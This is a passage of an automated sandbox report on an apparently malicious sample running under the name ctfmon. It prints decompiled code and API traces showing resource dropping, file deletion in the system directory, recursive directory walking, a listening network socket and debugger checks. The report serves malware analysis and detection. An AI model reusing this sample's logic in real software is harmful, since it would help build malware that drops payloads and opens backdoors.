				void* __esi;
				signed int _t107;
				intOrPtr _t118;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t132;
				signed char _t135;
				signed char _t137;
				signed char _t139;
				signed char _t141;
				signed char _t143;
				intOrPtr _t159;
				void* _t165;
				signed char _t167;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t198;
				void* _t199;
				signed int _t200;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				void* _t213;
				void* _t214;
				void* _t216;

				_t216 = __eflags;
				_push(0xffffffff);
				_push(E00984781);
				_push( *[fs:0x0]);
				_t214 = _t213 - 0xc8;
				_push(_t165);
				_push(_t199);
				_t107 =  *0x98f008; // 0x35554c2f
				_push(_t107 ^ _t212);
				 *[fs:0x0] =  &_v16;
				_v216 = 0x98cbac;
				InitializeCriticalSection( &_v212);
				_v188 = 0;
				_v184 = 0;
				_v180 = 0;
				_v8 = 0;
				_v56 = 0x98cbac;
				InitializeCriticalSection( &_v52);
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v176 = 0x98cbac;
				InitializeCriticalSection( &_v172);
				_v148 = 0;
				_v144 = 0;
				_v140 = 0;
				_v96 = 0x98cbac;
				InitializeCriticalSection( &_v92);
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v136 = 0x98cbac;
				InitializeCriticalSection( &_v132);
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v8 = 4;
				E00969B40( &_v136,  &_v96);
				E00969740(_t165,  &_v176,  &_v56, _t199);
				E009698C0(_t165,  &_v216, _t199, _t216);
				_t118 = _v24;
				_t200 = 0;
				if(_t118 != 0) {
					_t189 = _v64;
					asm("o16 nop [eax+eax]");
					do {
						_t167 = 0;
						_t211 = 0;
						if(_t189 == 0) {
							L11:
							_t190 = 0;
							__eflags = _t200 - _t118;
							if(__eflags < 0) {
								_t190 =  *((intOrPtr*)(_v28 + _t200 * 4));
							}
							E00969A20(_t167, _t190, _t200, _t211, __eflags);
							_t189 = _v64;
						} else {
							while(1) {
								_t198 = 0;
								if(_t200 < _t118) {
									_t198 =  *((intOrPtr*)(_v28 + _t200 * 4));
								}
								_t159 = 0;
								if(_t211 < _t189) {
									_t159 =  *((intOrPtr*)(_v68 + _t211 * 4));
								}
								E00977612(_t200, _t211, _t159, _t198);
								_t189 = _v64;
								_t214 = _t214 + 8;
								_t167 =  ==  ? 1 : _t167 & 0x000000ff;
								_t211 = _t211 + 1;
								if(_t211 >= _t189) {
									break;
								}
								_t118 = _v24;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								_t118 = _v24;
								goto L11;
							}
						}
						_t118 = _v24;
						_t200 = _t200 + 1;
						__eflags = _t200 - _t118;
					} while (_t200 < _t118);
				}
				E00969CC0( &_v176, 0x995ba8);
				E00969CC0( &_v136, 0x995ba8);
				E00969CC0( &_v56, 0x995bd0);
				E00969CC0( &_v216, 0x995bd0);
				E00969CC0( &_v96, 0x995bd0);
				_t124 = _v184;
				_t204 = 0;
				__eflags = _t124;
				if(_t124 != 0) {
					do {
						_t188 = 0;
						__eflags = _t204 - _t124;
						if(_t204 < _t124) {
							_t188 =  *((intOrPtr*)(_v188 + _t204 * 4));
						}
						_push(0x100);
						E00970AA1(_t188);
						_t124 = _v184;
						_t204 = _t204 + 1;
						_t214 = _t214 + 8;
						__eflags = _t204 - _t124;
					} while (_t204 < _t124);
				}
				_v184 = 0;
				E00966EF0( &_v216);
				_t126 = _v24;
				_t205 = 0;
				__eflags = _t126;
				if(_t126 != 0) {
					do {
						_t187 = 0;
						__eflags = _t205 - _t126;
						if(_t205 < _t126) {
							_t187 =  *((intOrPtr*)(_v28 + _t205 * 4));
						}
						_push(0x100);
						E00970AA1(_t187);
						_t126 = _v24;
						_t205 = _t205 + 1;
						_t214 = _t214 + 8;
						__eflags = _t205 - _t126;
					} while (_t205 < _t126);
				}
				_v24 = 0;
				E00966EF0( &_v56);
				_t128 = _v144;
				_t206 = 0;
				__eflags = _t128;
				if(_t128 != 0) {
					do {
						_t186 = 0;
						__eflags = _t206 - _t128;
						if(_t206 < _t128) {
							_t186 =  *((intOrPtr*)(_v148 + _t206 * 4));
						}
						_push(0x100);
						E00970AA1(_t186);
						_t128 = _v144;
						_t206 = _t206 + 1;
						_t214 = _t214 + 8;
						__eflags = _t206 - _t128;
					} while (_t206 < _t128);
				}
				_v144 = 0;
				E00966EF0( &_v176);
				_t130 = _v64;
				_t207 = 0;
				__eflags = _t130;
				if(_t130 != 0) {
					do {
						_t185 = 0;
						__eflags = _t207 - _t130;
						if(_t207 < _t130) {
							_t185 =  *((intOrPtr*)(_v68 + _t207 * 4));
						}
						_push(0x100);
						E00970AA1(_t185);
						_t130 = _v64;
						_t207 = _t207 + 1;
						_t214 = _t214 + 8;
						__eflags = _t207 - _t130;
					} while (_t207 < _t130);
				}
				_v64 = 0;
				E00966EF0( &_v96);
				_t132 = _v104;
				_t208 = 0;
				__eflags = _t132;
				if(_t132 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t184 = 0;
						__eflags = _t208 - _t132;
						if(_t208 < _t132) {
							_t184 =  *((intOrPtr*)(_v108 + _t208 * 4));
						}
						_push(0x100);
						E00970AA1(_t184);
						_t132 = _v104;
						_t208 = _t208 + 1;
						_t214 = _t214 + 8;
						__eflags = _t208 - _t132;
					} while (_t208 < _t132);
				}
				_v104 = 0;
				E00966EF0( &_v136);
				_v136 = 0x98cbac;
				DeleteCriticalSection( &_v132);
				_t135 = _v108;
				__eflags = _t135;
				if(_t135 != 0) {
					L00975A36(_t135);
					_t214 = _t214 + 4;
				}
				_v96 = 0x98cbac;
				DeleteCriticalSection( &_v92);
				_t137 = _v68;
				__eflags = _t137;
				if(_t137 != 0) {
					L00975A36(_t137);
					_t214 = _t214 + 4;
				}
				_v176 = 0x98cbac;
				DeleteCriticalSection( &_v172);
				_t139 = _v148;
				__eflags = _t139;
				if(_t139 != 0) {
					L00975A36(_t139);
					_t214 = _t214 + 4;
				}
				_v56 = 0x98cbac;
				DeleteCriticalSection( &_v52);
				_t141 = _v28;
				__eflags = _t141;
				if(_t141 != 0) {
					L00975A36(_t141);
					_t214 = _t214 + 4;
				}
				_v216 = 0x98cbac;
				DeleteCriticalSection( &_v212);
				_t143 = _v188;
				__eflags = _t143;
				if(_t143 != 0) {
					_t143 = L00975A36(_t143);
				}
				 *[fs:0x0] = _v16;
				return _t143;
			}




































































                                                0x00969d90
                                                0x00969d93
                                                0x00969d95
                                                0x00969da0
                                                0x00969da1
                                                0x00969da7
                                                0x00969da9
                                                0x00969daa
                                                0x00969db1
                                                0x00969db5
                                                0x00969dc8
                                                0x00969dd2
                                                0x00969dd4
                                                0x00969dde
                                                0x00969de8
                                                0x00969df5
                                                0x00969dfd
                                                0x00969e04
                                                0x00969e06
                                                0x00969e0d
                                                0x00969e14
                                                0x00969e21
                                                0x00969e2c
                                                0x00969e2e
                                                0x00969e38
                                                0x00969e42
                                                0x00969e4f
                                                0x00969e57
                                                0x00969e59
                                                0x00969e60
                                                0x00969e67
                                                0x00969e71
                                                0x00969e7c
                                                0x00969e7e
                                                0x00969e85
                                                0x00969e8c
                                                0x00969e96
                                                0x00969ea0
                                                0x00969eae
                                                0x00969eb9
                                                0x00969ebe
                                                0x00969ec1
                                                0x00969ec5
                                                0x00969ec7
                                                0x00969eca
                                                0x00969ed0
                                                0x00969ed0
                                                0x00969ed2
                                                0x00969ed6
                                                0x00969f1b
                                                0x00969f1b
                                                0x00969f1d
                                                0x00969f1f
                                                0x00969f24
                                                0x00969f24
                                                0x00969f27
                                                0x00969f2c
                                                0x00969ed8
                                                0x00969ed8
                                                0x00969ed8
                                                0x00969edc
                                                0x00969ee1
                                                0x00969ee1
                                                0x00969ee4
                                                0x00969ee8
                                                0x00969eed
                                                0x00969eed
                                                0x00969ef2
                                                0x00969ef7
                                                0x00969efa
                                                0x00969f07
                                                0x00969f0a
                                                0x00969f0d
                                                0x00000000
                                                0x00000000
                                                0x00969f0f
                                                0x00969f0f
                                                0x00969f14
                                                0x00969f16
                                                0x00969f18
                                                0x00000000
                                                0x00969f18
                                                0x00969f16
                                                0x00969f2f
                                                0x00969f32
                                                0x00969f33
                                                0x00969f33
                                                0x00969ed0
                                                0x00969f42
                                                0x00969f52
                                                0x00969f5f
                                                0x00969f6f
                                                0x00969f7c
                                                0x00969f81
                                                0x00969f87
                                                0x00969f89
                                                0x00969f8b
                                                0x00969f90
                                                0x00969f90
                                                0x00969f92
                                                0x00969f94
                                                0x00969f9c
                                                0x00969f9c
                                                0x00969f9f
                                                0x00969fa5
                                                0x00969faa
                                                0x00969fb0
                                                0x00969fb1
                                                0x00969fb4
                                                0x00969fb4
                                                0x00969f90
                                                0x00969fbe
                                                0x00969fc8
                                                0x00969fcd
                                                0x00969fd0
                                                0x00969fd2
                                                0x00969fd4
                                                0x00969fd6
                                                0x00969fd6
                                                0x00969fd8
                                                0x00969fda
                                                0x00969fdf
                                                0x00969fdf
                                                0x00969fe2
                                                0x00969fe8
                                                0x00969fed
                                                0x00969ff0
                                                0x00969ff1
                                                0x00969ff4
                                                0x00969ff4
                                                0x00969fd6
                                                0x00969ffb
                                                0x0096a002
                                                0x0096a007
                                                0x0096a00d
                                                0x0096a00f
                                                0x0096a011
                                                0x0096a013
                                                0x0096a013
                                                0x0096a015
                                                0x0096a017
                                                0x0096a01f
                                                0x0096a01f
                                                0x0096a022
                                                0x0096a028
                                                0x0096a02d
                                                0x0096a033
                                                0x0096a034
                                                0x0096a037
                                                0x0096a037
                                                0x0096a013
                                                0x0096a041
                                                0x0096a04b
                                                0x0096a050
                                                0x0096a053
                                                0x0096a055
                                                0x0096a057
                                                0x0096a060
                                                0x0096a060
                                                0x0096a062
                                                0x0096a064
                                                0x0096a069
                                                0x0096a069
                                                0x0096a06c
                                                0x0096a072
                                                0x0096a077
                                                0x0096a07a
                                                0x0096a07b
                                                0x0096a07e
                                                0x0096a07e
                                                0x0096a060
                                                0x0096a085
                                                0x0096a08c
                                                0x0096a091
                                                0x0096a094
                                                0x0096a096
                                                0x0096a098
                                                0x0096a09a
                                                0x0096a0a0
                                                0x0096a0a0
                                                0x0096a0a2
                                                0x0096a0a4
                                                0x0096a0a9
                                                0x0096a0a9
                                                0x0096a0ac
                                                0x0096a0b2
                                                0x0096a0b7
                                                0x0096a0ba
                                                0x0096a0bb
                                                0x0096a0be
                                                0x0096a0be
                                                0x0096a0a0
                                                0x0096a0c8
                                                0x0096a0cf
                                                0x0096a0de
                                                0x0096a0e8
                                                0x0096a0ea
                                                0x0096a0ed
                                                0x0096a0ef
                                                0x0096a0f2
                                                0x0096a0f7
                                                0x0096a0f7
                                                0x0096a0fd
                                                0x0096a105
                                                0x0096a107
                                                0x0096a10a
                                                0x0096a10c
                                                0x0096a10f
                                                0x0096a114
                                                0x0096a114
                                                0x0096a11d
                                                0x0096a128
                                                0x0096a12a
                                                0x0096a130
                                                0x0096a132
                                                0x0096a135
                                                0x0096a13a
                                                0x0096a13a
                                                0x0096a140
                                                0x0096a148
                                                0x0096a14a
                                                0x0096a14d
                                                0x0096a14f
                                                0x0096a152
                                                0x0096a157
                                                0x0096a157
                                                0x0096a160
                                                0x0096a16b
                                                0x0096a16d
                                                0x0096a173
                                                0x0096a175
                                                0x0096a178
                                                0x0096a17d
                                                0x0096a183
                                                0x0096a191

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(73B76490,35554C2F), ref: 00969DD2
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00969E04
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00969E2C
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00969E57
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00969E7C
                                                  • Part of subcall function 00969B40: new.LIBCMT ref: 00969BAB
                                                  • Part of subcall function 00969740: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 009697A9
                                                  • Part of subcall function 00969740: DeleteFileA.KERNEL32(?), ref: 009697EF
                                                  • Part of subcall function 00969740: DeleteFileA.KERNEL32(?), ref: 009697F8
                                                  • Part of subcall function 00969740: FindResourceA.KERNEL32(00000000,00000065,BIN), ref: 00969803
                                                  • Part of subcall function 00969740: SizeofResource.KERNEL32(00000000,00000000,77109EB0), ref: 00969817
                                                  • Part of subcall function 00969740: LoadResource.KERNEL32(00000000,00000000), ref: 00969822
                                                  • Part of subcall function 00969740: LockResource.KERNEL32(00000000), ref: 00969829
                                                  • Part of subcall function 00969740: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 0096986B
                                                  • Part of subcall function 009698C0: new.LIBCMT ref: 009699A6
                                                • DeleteCriticalSection.KERNEL32(?), ref: 0096A0E8
                                                • DeleteCriticalSection.KERNEL32(?), ref: 0096A105
                                                • DeleteCriticalSection.KERNEL32(?), ref: 0096A128
                                                • DeleteCriticalSection.KERNEL32(?), ref: 0096A148
                                                • DeleteCriticalSection.KERNEL32(73B76490), ref: 0096A16B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Delete$Initialize$Resource$File$DirectoryFindLoadLockObjectSingleSizeofSystemWait
                                                • String ID: /LU5/
                                                • API String ID: 2718288186-937868281
                                                • Opcode ID: 54e65ad23ef13ea313e3bfd57c33b0e8f8f67a11fe2c8d05dd9f0f6c26c33f23
                                                • Instruction ID: 6861dc5187aa0d70ed1f647f581977882d3bb96d9f452191f296fb6c30f1c9ab
                                                • Opcode Fuzzy Hash: 54e65ad23ef13ea313e3bfd57c33b0e8f8f67a11fe2c8d05dd9f0f6c26c33f23
                                                • Instruction Fuzzy Hash: 1BB13D71E002299FDF24EFA4C895B9EB7F9AF44304F4141A9E849B7241EB719E44CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096AA40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 143fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E0096AA40(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi) {
				signed int _v12;
				short _v536;
				char _v1056;
				struct _WIN32_FIND_DATAW _v1648;
				signed int _v1649;
				intOrPtr _v1656;
				void* __esi;
				signed int _t32;
				signed int _t36;
				signed int _t37;
				WCHAR* _t38;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				signed int _t50;
				signed int _t51;
				WCHAR* _t55;
				void* _t62;
				intOrPtr* _t64;
				char* _t67;
				char* _t70;
				void* _t74;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				intOrPtr* _t80;
				void* _t81;
				signed int _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;

				_t32 =  *0x98f008; // 0x35554c2f
				_v12 = _t32 ^ _t82;
				_v1656 = __edx;
				_t80 = __ecx;
				E00973440(__ecx,  &_v536, 0, 0x208);
				_t64 = _t80;
				_t84 = _t83 + 0xc;
				_t74 = _t64 + 2;
				do {
					_t36 =  *_t64;
					_t64 = _t64 + 2;
				} while (_t36 != 0);
				_t81 = wsprintfW;
				_push(_t80);
				_t37 = _t36 & 0xffffff00 |  *((short*)(_t80 + (_t64 - _t74 >> 1) * 2 - 2)) == 0x0000005c;
				_v1649 = _t37;
				_t38 =  &_v536;
				if(_t37 == 0) {
					_push(L"%ws\\*");
				} else {
					_push(L"%ws*");
				}
				wsprintfW(_t38, ??);
				_t85 = _t84 + 0xc;
				_t62 = FindFirstFileW( &_v536,  &_v1648);
				if(_t62 != 0xffffffff) {
					do {
						_t67 = ".";
						_t43 =  &(_v1648.cFileName);
						while(1) {
							_t75 =  *_t43;
							__eflags = _t75 -  *_t67;
							if(_t75 !=  *_t67) {
								break;
							}
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
								_t44 = 0;
							} else {
								_t78 =  *((intOrPtr*)(_t43 + 2));
								_t17 =  &(_t67[2]); // 0x2e0000
								__eflags = _t78 -  *_t17;
								if(_t78 !=  *_t17) {
									break;
								} else {
									_t43 = _t43 + 4;
									_t67 =  &(_t67[4]);
									__eflags = _t78;
									if(_t78 != 0) {
										continue;
									} else {
										goto L12;
									}
								}
							}
							L14:
							__eflags = _t44;
							if(_t44 != 0) {
								_t70 = L"..";
								_t50 =  &(_v1648.cFileName);
								while(1) {
									_t76 =  *_t50;
									__eflags = _t76 -  *_t70;
									if(_t76 !=  *_t70) {
										break;
									}
									__eflags = _t76;
									if(_t76 == 0) {
										L20:
										_t51 = 0;
									} else {
										_t77 =  *((intOrPtr*)(_t50 + 2));
										_t20 =  &(_t70[2]); // 0x2e
										__eflags = _t77 -  *_t20;
										if(_t77 !=  *_t20) {
											break;
										} else {
											_t50 = _t50 + 4;
											_t70 =  &(_t70[4]);
											__eflags = _t77;
											if(_t77 != 0) {
												continue;
											} else {
												goto L20;
											}
										}
									}
									L22:
									__eflags = _t51;
									if(_t51 != 0) {
										__eflags = _v1648.dwFileAttributes & 0x00000010;
										if((_v1648.dwFileAttributes & 0x00000010) != 0) {
											E00973440(_t80,  &_v1056, 0, 0x208);
											_t86 = _t85 + 0xc;
											__eflags = _v1649;
											_push( &(_v1648.cFileName));
											_push(_t80);
											_t55 =  &_v1056;
											if(__eflags == 0) {
												_push(L"%ws\\%ws");
											} else {
												_push(L"%ws%ws");
											}
											wsprintfW(_t55, ??);
											E0096A970(_t62, _t80, __eflags, _v1656,  &_v1056);
											_t85 = _t86 + 0x18;
										}
									}
									goto L28;
								}
								asm("sbb eax, eax");
								_t51 = _t50 | 0x00000001;
								__eflags = _t51;
								goto L22;
							}
							goto L28;
						}
						asm("sbb eax, eax");
						_t44 = _t43 | 0x00000001;
						__eflags = _t44;
						goto L14;
						L28:
						_t46 = FindNextFileW(_t62,  &_v1648);
						__eflags = _t46;
					} while (_t46 != 0);
					FindClose(_t62);
					__eflags = _v12 ^ _t82;
					return E00970A5D(_v12 ^ _t82, _t81);
				} else {
					return E00970A5D(_v12 ^ _t82, _t81);
				}
			}




































                                                0x0096aa49
                                                0x0096aa50
                                                0x0096aa61
                                                0x0096aa6a
                                                0x0096aa6c
                                                0x0096aa71
                                                0x0096aa73
                                                0x0096aa76
                                                0x0096aa80
                                                0x0096aa80
                                                0x0096aa83
                                                0x0096aa86
                                                0x0096aa8b
                                                0x0096aa95
                                                0x0096aa9c
                                                0x0096aa9f
                                                0x0096aaa7
                                                0x0096aaad
                                                0x0096aab6
                                                0x0096aaaf
                                                0x0096aaaf
                                                0x0096aaaf
                                                0x0096aabc
                                                0x0096aabe
                                                0x0096aad5
                                                0x0096aada
                                                0x0096aaf0
                                                0x0096aaf0
                                                0x0096aaf5
                                                0x0096ab00
                                                0x0096ab00
                                                0x0096ab03
                                                0x0096ab06
                                                0x00000000
                                                0x00000000
                                                0x0096ab08
                                                0x0096ab0b
                                                0x0096ab22
                                                0x0096ab22
                                                0x0096ab0d
                                                0x0096ab0d
                                                0x0096ab11
                                                0x0096ab11
                                                0x0096ab15
                                                0x00000000
                                                0x0096ab17
                                                0x0096ab17
                                                0x0096ab1a
                                                0x0096ab1d
                                                0x0096ab20
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096ab20
                                                0x0096ab15
                                                0x0096ab2b
                                                0x0096ab2b
                                                0x0096ab2d
                                                0x0096ab33
                                                0x0096ab38
                                                0x0096ab40
                                                0x0096ab40
                                                0x0096ab43
                                                0x0096ab46
                                                0x00000000
                                                0x00000000
                                                0x0096ab48
                                                0x0096ab4b
                                                0x0096ab62
                                                0x0096ab62
                                                0x0096ab4d
                                                0x0096ab4d
                                                0x0096ab51
                                                0x0096ab51
                                                0x0096ab55
                                                0x00000000
                                                0x0096ab57
                                                0x0096ab57
                                                0x0096ab5a
                                                0x0096ab5d
                                                0x0096ab60
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0096ab60
                                                0x0096ab55
                                                0x0096ab6b
                                                0x0096ab6b
                                                0x0096ab6d
                                                0x0096ab6f
                                                0x0096ab76
                                                0x0096ab86
                                                0x0096ab8b
                                                0x0096ab94
                                                0x0096ab9b
                                                0x0096ab9c
                                                0x0096ab9d
                                                0x0096aba3
                                                0x0096abac
                                                0x0096aba5
                                                0x0096aba5
                                                0x0096aba5
                                                0x0096abb2
                                                0x0096abc4
                                                0x0096abc9
                                                0x0096abc9
                                                0x0096ab76
                                                0x00000000
                                                0x0096ab6d
                                                0x0096ab66
                                                0x0096ab68
                                                0x0096ab68
                                                0x00000000
                                                0x0096ab68
                                                0x00000000
                                                0x0096ab2d
                                                0x0096ab26
                                                0x0096ab28
                                                0x0096ab28
                                                0x00000000
                                                0x0096abcc
                                                0x0096abd4
                                                0x0096abda
                                                0x0096abda
                                                0x0096abe3
                                                0x0096abf0
                                                0x0096abfb
                                                0x0096aadc
                                                0x0096aaee
                                                0x0096aaee

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileFindFirstwsprintf
                                                • String ID: %ws%ws$%ws*$%ws\%ws$%ws\*$/LU5/
                                                • API String ID: 2655791690-3347939045
                                                • Opcode ID: a5ec9d26f53de050e5478afb7f3001ba51602c395596192ea95ab5db18414f7d
                                                • Instruction ID: 1912ad5f6da927605c8bf60431a93d12a8c9a18ab0e7fa638a6fa6b9ad4e26c6
                                                • Opcode Fuzzy Hash: a5ec9d26f53de050e5478afb7f3001ba51602c395596192ea95ab5db18414f7d
                                                • Instruction Fuzzy Hash: 6641F6719002189ADB24AB70DD46FFA737EEF61314F4445E6D90DE6281E732DA84CF62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00968EC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00968ED9
                                                • htons.WS2_32(?), ref: 00968F14
                                                • htonl.WS2_32(00000000), ref: 00968F29
                                                • bind.WS2_32(?,?,00000010), ref: 00968F3E
                                                • listen.WS2_32(?,00000005), ref: 00968F50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: bindhtonlhtonslistensocket
                                                • String ID: /LU5/
                                                • API String ID: 3517227109-937868281
                                                • Opcode ID: f0cd78e20bf69fc677bade96694aa0e6c3e9abdaec64c1d486a408c8955f4e37
                                                • Instruction ID: f75c79892e96749bfdf26fe7fe61eebfc94d426ef4bcc8c56b0f8e0dc81e6d81
                                                • Opcode Fuzzy Hash: f0cd78e20bf69fc677bade96694aa0e6c3e9abdaec64c1d486a408c8955f4e37
                                                • Instruction Fuzzy Hash: D811A375A10309EBDB10DFB4DC0ABAFB7B4EF44310F11426AE815EB251EB719A04EB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00975A46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E00975A46(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x98f008; // 0x35554c2f
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00971623(_t41);
					_pop(_t62);
				}
				E00973440(_t67,  &_v804, 0, 0x50);
				E00973440(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x40000019
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x3ffffced
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00971623(_t57);
				}
				return E00970A5D(_v8 ^ _t70, _t69);
			}





































                                                0x00975a46
                                                0x00975a46
                                                0x00975a46
                                                0x00975a46
                                                0x00975a51
                                                0x00975a56
                                                0x00975a58
                                                0x00975a60
                                                0x00975a62
                                                0x00975a65
                                                0x00975a6a
                                                0x00975a6a
                                                0x00975a76
                                                0x00975a89
                                                0x00975a97
                                                0x00975a9d
                                                0x00975aa3
                                                0x00975aa9
                                                0x00975aaf
                                                0x00975ab5
                                                0x00975abb
                                                0x00975ac1
                                                0x00975ac7
                                                0x00975acd
                                                0x00975ad4
                                                0x00975adb
                                                0x00975ae2
                                                0x00975ae9
                                                0x00975af0
                                                0x00975af7
                                                0x00975af8
                                                0x00975b01
                                                0x00975b07
                                                0x00975b07
                                                0x00975b0a
                                                0x00975b10
                                                0x00975b1d
                                                0x00975b26
                                                0x00975b2f
                                                0x00975b38
                                                0x00975b46
                                                0x00975b48
                                                0x00975b4e
                                                0x00975b5d
                                                0x00975b69
                                                0x00975b6c
                                                0x00975b71
                                                0x00975b80

                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00975B3E
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00975B48
                                                • UnhandledExceptionFilter.KERNEL32(3FFFFCED,?,?,?,?,?,00000000), ref: 00975B55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID: /LU5/
                                                • API String ID: 3906539128-937868281
                                                • Opcode ID: a9b7cc23dfeb6e635b421da7194f41e896ee1c676216d81c74437dbe1618bd44
                                                • Instruction ID: 6c1b7b131c28ef24793b13a71945ccf9e07420d74e384c5c26c08d5f2c793a69
                                                • Opcode Fuzzy Hash: a9b7cc23dfeb6e635b421da7194f41e896ee1c676216d81c74437dbe1618bd44
                                                • Instruction Fuzzy Hash: A031C47591121CABCB61DF68D88979DBBB8FF48310F5081EAE41CA7260E7709F858F45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097B9D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E0097B9D3(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __esi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t110;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				void* _t114;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
